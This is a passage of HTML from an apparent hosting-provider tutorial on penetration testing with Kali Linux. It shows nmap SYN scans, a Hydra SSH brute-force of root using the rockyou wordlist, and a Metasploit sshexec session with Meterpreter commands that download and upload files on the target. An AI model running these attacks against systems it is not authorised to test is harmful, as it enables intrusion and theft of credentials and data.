data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">nmap -sS [target_ip]<\/pre><p>The <strong>-sS<\/strong> flag performs an SYN scan, also called a &ldquo;half-open&rdquo; scan, which doesn&rsquo;t fully establish a TCP connection, making it less likely to trigger alarms.<\/p><p><strong>Scan specific ports<\/strong><\/p><p>You can specify a range if you only need to scan certain ports. For example:<\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">nmap -p 1-100 [target_ip]<\/pre><p>This scans ports <strong>1<\/strong> through <strong>100<\/strong> only. Adjust the range as needed to save time.<\/p><p><strong>Save scan results<\/strong><\/p><p>You can save your scan results to files for later analysis:<\/p><ul class=\"wp-block-list\">\n<li>Normal output, useful for quick reviews:<\/li>\n<\/ul><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">nmap -oN scan_results.txt [target_ip]<\/pre><ul class=\"wp-block-list\">\n<li>XML format, ideal for importing results into other tools:<\/li>\n<\/ul><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">nmap -oX scan_results.xml [target_ip]<\/pre><h3 class=\"wp-block-heading\" id=\"h-brute-forcing-login-credentials-with-hydra\">Brute-forcing login credentials with Hydra<\/h3><p>You can also utilize Kali Linux to test login credentials using Hydra. It&rsquo;s a powerful password-cracking tool that works on various protocols, including SSH, FTP, and HTTP.<\/p><p>Please note that you must know your target&rsquo;s username to use Hydra effectively. In our case, the default username is <strong>root<\/strong>. Follow these steps:<\/p><p><strong>Extract the wordlist<\/strong><\/p><p>A wordlist is important for Hydra since it tries to find each password on the list until it finds a match. Kali Linux includes a popular wordlist, <strong>rockyou.txt<\/strong>, which you can find at:<\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">\/usr\/share\/wordlists\/rockyou.txt.gz<\/pre><p>If <strong>rockyou.txt.gz<\/strong> is present, extract it with:<\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">sudo gunzip \/usr\/share\/wordlists\/rockyou.txt.gz<\/pre><p>This will create the <strong>rockyou.txt<\/strong> file in the same directory.<\/p><div class=\"wp-block-image\"><figure data-wp-context='{\"imageId\":\"69e085dd85d5d\"}' data-wp-interactive=\"core\/image\" class=\"aligncenter size-large wp-lightbox-container\"><img decoding=\"async\" width=\"1024\" height=\"126\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-on-async--load=\"callbacks.setButtonStyles\" data-wp-on-async-window--resize=\"callbacks.setButtonStyles\" src=\"\/tutorials\/wp-content\/uploads\/sites\/2\/2024\/11\/terminal-wordlists-rockyou-txt-highlighted-1024x126.png\" alt=\"The rockyou.txt file in the wordlists directory\" class=\"wp-image-119165\" srcset=\"https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-wordlists-rockyou-txt-highlighted-1024x126.png 1024w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-wordlists-rockyou-txt-highlighted-300x37.png 300w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-wordlists-rockyou-txt-highlighted-150x18.png 150w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-wordlists-rockyou-txt-highlighted-768x94.png 768w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-wordlists-rockyou-txt-highlighted-1536x188.png 1536w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-wordlists-rockyou-txt-highlighted-2048x251.png 2048w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><button class=\"lightbox-trigger\" type=\"button\" aria-haspopup=\"dialog\" aria-label=\"Enlarge\" data-wp-init=\"callbacks.initTriggerButton\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-style--right=\"state.imageButtonRight\" data-wp-style--top=\"state.imageButtonTop\">\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewbox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\"><\/path>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure><\/div><p>However, if the <strong>rockyou.txt.gz<\/strong> file is missing, you need to install the wordlists package:<\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">sudo apt update\n\nsudo apt install wordlists<\/pre><p>This should install the <strong>rockyou.txt.gz<\/strong> file, and then you can extract it as previously explained.<\/p><p>Alternatively, you can create your custom wordlist if you want a smaller, targeted set of passwords.<\/p><p><strong>Run Hydra<\/strong><\/p><p>Now that everything&rsquo;s ready, use the following command to brute-force SSH login on your target VPS:<\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">hydra -l root -P \/usr\/share\/wordlists\/rockyou.txt ssh:\/\/[target_ip]<\/pre><p>In this command, replace:<\/p><ul class=\"wp-block-list\">\n<li><strong>root<\/strong> &ndash; the actual username you want to test.<\/li>\n\n\n\n<li><strong>\/usr\/share\/wordlists\/rockyou.txt<\/strong> &ndash; the path to your custom wordlist if you use one.<\/li>\n\n\n\n<li><strong>[target_ip]<\/strong> &ndash; your target VPS&rsquo; IP address.<\/li>\n<\/ul><p><strong>Interpret results<\/strong><\/p><p>Hydra will begin testing each password in the wordlist. If there&rsquo;s a successful attempt, Hydra will display it in the terminal, showing which password was correct. For example:<\/p><div class=\"wp-block-image\"><figure data-wp-context='{\"imageId\":\"69e085dd8637a\"}' data-wp-interactive=\"core\/image\" class=\"aligncenter size-large wp-lightbox-container\"><img decoding=\"async\" width=\"1024\" height=\"221\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-on-async--load=\"callbacks.setButtonStyles\" data-wp-on-async-window--resize=\"callbacks.setButtonStyles\" src=\"\/tutorials\/wp-content\/uploads\/sites\/2\/2024\/11\/terminal-hydra-output-1024x221.png\" alt=\"The output of a Hydra brute-forcing attempt\" class=\"wp-image-119166\" srcset=\"https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-hydra-output-1024x221.png 1024w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-hydra-output-300x65.png 300w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-hydra-output-150x32.png 150w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-hydra-output-768x165.png 768w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-hydra-output-1536x331.png 1536w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-hydra-output-2048x441.png 2048w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><button class=\"lightbox-trigger\" type=\"button\" aria-haspopup=\"dialog\" aria-label=\"Enlarge\" data-wp-init=\"callbacks.initTriggerButton\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-style--right=\"state.imageButtonRight\" data-wp-style--top=\"state.imageButtonTop\">\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewbox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\"><\/path>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure><\/div><p>Remember that brute-forcing can take a few minutes to several days, depending on your wordlist size and the target password&rsquo;s complexity.<\/p><h3 class=\"wp-block-heading\" id=\"h-exploiting-target-systems-with-metasploit\">Exploiting target systems with Metasploit<\/h3><p>As a popular penetration testing tool, Metasploit Framework offers modules to exploit vulnerabilities, test security, deliver payloads, and maintain access to target systems.<\/p><p>Here&rsquo;s how to get started with Metasploit:<\/p><p><strong>Launch Metasploit<\/strong><\/p><p>Open Metasploit by typing:<\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">msfconsole<\/pre><p>This will bring up the Metasploit console, where you can search for and execute exploits and payloads.<\/p><div class=\"wp-block-image\"><figure data-wp-context='{\"imageId\":\"69e085dd86965\"}' data-wp-interactive=\"core\/image\" class=\"aligncenter size-large wp-lightbox-container\"><img decoding=\"async\" width=\"1024\" height=\"674\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-on-async--load=\"callbacks.setButtonStyles\" data-wp-on-async-window--resize=\"callbacks.setButtonStyles\" src=\"\/tutorials\/wp-content\/uploads\/sites\/2\/2024\/11\/terminal-metasploit-console-1024x674.png\" alt=\"The Metasploit console in the terminal\" class=\"wp-image-119167\" srcset=\"https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-metasploit-console-1024x674.png 1024w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-metasploit-console-300x198.png 300w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-metasploit-console-150x99.png 150w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-metasploit-console-768x506.png 768w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-metasploit-console-1536x1011.png 1536w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-metasploit-console-2048x1348.png 2048w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><button class=\"lightbox-trigger\" type=\"button\" aria-haspopup=\"dialog\" aria-label=\"Enlarge\" data-wp-init=\"callbacks.initTriggerButton\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-style--right=\"state.imageButtonRight\" data-wp-style--top=\"state.imageButtonTop\">\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewbox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\"><\/path>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure><\/div><p><strong>Search for an exploit<\/strong><\/p><p>Based on what you discovered with Nmap, like open ports and services, search for relevant exploits in Metasploit. For example, if your target has an SSH service running, search for SSH-related ones:<\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">search ssh<\/pre><p>Metasploit will return a list of matching exploits that you can use.<\/p><div class=\"wp-block-image\"><figure data-wp-context='{\"imageId\":\"69e085dd86f13\"}' data-wp-interactive=\"core\/image\" class=\"aligncenter size-large wp-lightbox-container\"><img decoding=\"async\" width=\"1024\" height=\"574\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-on-async--load=\"callbacks.setButtonStyles\" data-wp-on-async-window--resize=\"callbacks.setButtonStyles\" src=\"\/tutorials\/wp-content\/uploads\/sites\/2\/2024\/11\/terminal-metasploit-console-modules-ssh-1024x574.png\" alt=\"The SSH-related exploits in the Metasploit console\" class=\"wp-image-119168\" srcset=\"https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-metasploit-console-modules-ssh-1024x574.png 1024w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-metasploit-console-modules-ssh-300x168.png 300w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-metasploit-console-modules-ssh-150x84.png 150w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-metasploit-console-modules-ssh-768x431.png 768w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-metasploit-console-modules-ssh-1536x862.png 1536w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-metasploit-console-modules-ssh-2048x1149.png 2048w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><button class=\"lightbox-trigger\" type=\"button\" aria-haspopup=\"dialog\" aria-label=\"Enlarge\" data-wp-init=\"callbacks.initTriggerButton\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-style--right=\"state.imageButtonRight\" data-wp-style--top=\"state.imageButtonTop\">\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewbox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\"><\/path>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure><\/div><p><strong>Select and set up an exploit<\/strong><\/p><p>Choose an exploit from the list. For this example, we&rsquo;ll use <strong>sshexec<\/strong>, a module that executes commands on a target system via SSH. This module isn&rsquo;t technically an exploit in the traditional sense; it&rsquo;s a post-authentication tool that requires valid SSH credentials.<\/p><p>Since we already know the target&rsquo;s password after brute-forcing with Hydra, we can use this module to interact with the target. While it&rsquo;s similar to logging in directly via a terminal, using <strong>sshexec<\/strong> adds more flexibility because it offers some post-exploitation features.<\/p><p>Load the <strong>sshexec<\/strong> module:<\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">use exploit\/multi\/ssh\/sshexec<\/pre><p>After loading the exploit, check the required options:<\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">show options<\/pre><div class=\"wp-block-image\"><figure data-wp-context='{\"imageId\":\"69e085dd875fb\"}' data-wp-interactive=\"core\/image\" class=\"aligncenter size-large wp-lightbox-container\"><img decoding=\"async\" width=\"1024\" height=\"376\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-on-async--load=\"callbacks.setButtonStyles\" data-wp-on-async-window--resize=\"callbacks.setButtonStyles\" src=\"\/tutorials\/wp-content\/uploads\/sites\/2\/2024\/11\/terminal-metasploit-console-sshexec-password-rhosts-highlighted-1024x376.png\" alt=\"The mandatory PASSWORD and RHOSTS fields for the sshexec module\" class=\"wp-image-119169\" srcset=\"https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-metasploit-console-sshexec-password-rhosts-highlighted-1024x376.png 1024w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-metasploit-console-sshexec-password-rhosts-highlighted-300x110.png 300w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-metasploit-console-sshexec-password-rhosts-highlighted-150x55.png 150w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-metasploit-console-sshexec-password-rhosts-highlighted-768x282.png 768w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-metasploit-console-sshexec-password-rhosts-highlighted-1536x564.png 1536w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-metasploit-console-sshexec-password-rhosts-highlighted-2048x751.png 2048w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><button class=\"lightbox-trigger\" type=\"button\" aria-haspopup=\"dialog\" aria-label=\"Enlarge\" data-wp-init=\"callbacks.initTriggerButton\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-style--right=\"state.imageButtonRight\" data-wp-style--top=\"state.imageButtonTop\">\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewbox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\"><\/path>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure><\/div><p>Pay attention to mandatory fields with blank values indicating you must manually set them. In our case, we must set the target IP and password:<\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">set RHOSTS [target_ip]\n\nset PASSWORD [target_password]<\/pre><p><strong>Interact with the target<\/strong><\/p><p>Once everything is configured, run the exploit:<\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">run<\/pre><p>This opens a <a href=\"https:\/\/doubleoctopus.com\/security-wiki\/threats-and-tools\/meterpreter\" target=\"_blank\" rel=\"noopener\">Meterpreter<\/a> session, which provides powerful control over the target system. To understand the environment you&rsquo;re working in, start with these commands:<\/p><ul class=\"wp-block-list\">\n<li>Check system information:<\/li>\n<\/ul><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">sysinfo<\/pre><ul class=\"wp-block-list\">\n<li>Check the current user:<\/li>\n<\/ul><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">getuid<\/pre><div class=\"wp-block-image\"><figure data-wp-context='{\"imageId\":\"69e085dd87f15\"}' data-wp-interactive=\"core\/image\" class=\"aligncenter size-large wp-lightbox-container\"><img decoding=\"async\" width=\"1024\" height=\"318\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-on-async--load=\"callbacks.setButtonStyles\" data-wp-on-async-window--resize=\"callbacks.setButtonStyles\" src=\"\/tutorials\/wp-content\/uploads\/sites\/2\/2024\/11\/terminal-meterpreter-sysinfo-getuid-output-1024x318.png\" alt=\"The outputs of sysinfo and getuid commands in Meterpreter\" class=\"wp-image-119170\" srcset=\"https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-meterpreter-sysinfo-getuid-output-1024x318.png 1024w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-meterpreter-sysinfo-getuid-output-300x93.png 300w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-meterpreter-sysinfo-getuid-output-150x47.png 150w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-meterpreter-sysinfo-getuid-output-768x239.png 768w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-meterpreter-sysinfo-getuid-output-1536x477.png 1536w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-meterpreter-sysinfo-getuid-output.png 1616w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><button class=\"lightbox-trigger\" type=\"button\" aria-haspopup=\"dialog\" aria-label=\"Enlarge\" data-wp-init=\"callbacks.initTriggerButton\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-style--right=\"state.imageButtonRight\" data-wp-style--top=\"state.imageButtonTop\">\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewbox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\"><\/path>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure><\/div><p>Similar to navigating your server, Meterpreter provides commands to interact with the target&rsquo;s file system:<\/p><ul class=\"wp-block-list\">\n<li>List files in the current directory:<\/li>\n<\/ul><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">ls<\/pre><ul class=\"wp-block-list\">\n<li>Change directories:<\/li>\n<\/ul><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">cd \/path\/to\/directory<\/pre><ul class=\"wp-block-list\">\n<li>Download a file from the target to your local system:<\/li>\n<\/ul><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">download \/path\/to\/target\/file<\/pre><ul class=\"wp-block-list\">\n<li>Upload a file to the target system, such as a script or utility:<\/li>\n<\/ul><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">upload \/path\/to\/local\/file<\/pre><p>You can also get details about the target&rsquo;s network connections and interfaces:<\/p><ul class=\"wp-block-list\">\n<li>Show network interfaces:<\/li>\n<\/ul><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">ifconfig<\/pre><ul class=\"wp-block-list\">\n<li>Check active network connections using the <a href=\"\/in\/tutorials\/netstat-command\">netstat command<\/a>:<\/li>\n<\/ul><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">netstat<\/pre><div class=\"wp-block-image\"><figure data-wp-context='{\"imageId\":\"69e085dd88770\"}' data-wp-interactive=\"core\/image\" class=\"aligncenter size-large wp-lightbox-container\"><img decoding=\"async\" width=\"1024\" height=\"577\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-on-async--load=\"callbacks.setButtonStyles\" data-wp-on-async-window--resize=\"callbacks.setButtonStyles\" src=\"\/tutorials\/wp-content\/uploads\/sites\/2\/2024\/11\/terminal-meterpreter-ifconfig-netstat-output-1024x577.png\" alt=\"The outputs of ifconfig and netstat commands in Meterpreter\" class=\"wp-image-119171\" srcset=\"https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-meterpreter-ifconfig-netstat-output-1024x577.png 1024w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-meterpreter-ifconfig-netstat-output-300x169.png 300w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-meterpreter-ifconfig-netstat-output-150x85.png 150w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-meterpreter-ifconfig-netstat-output-768x433.png 768w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-meterpreter-ifconfig-netstat-output-1536x866.png 1536w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-meterpreter-ifconfig-netstat-output-2048x1155.png 2048w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><button class=\"lightbox-trigger\" type=\"button\" aria-haspopup=\"dialog\" aria-label=\"Enlarge\" data-wp-init=\"callbacks.initTriggerButton\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-style--right=\"state.imageButtonRight\" data-wp-style--top=\"state.imageButtonTop\">\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewbox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 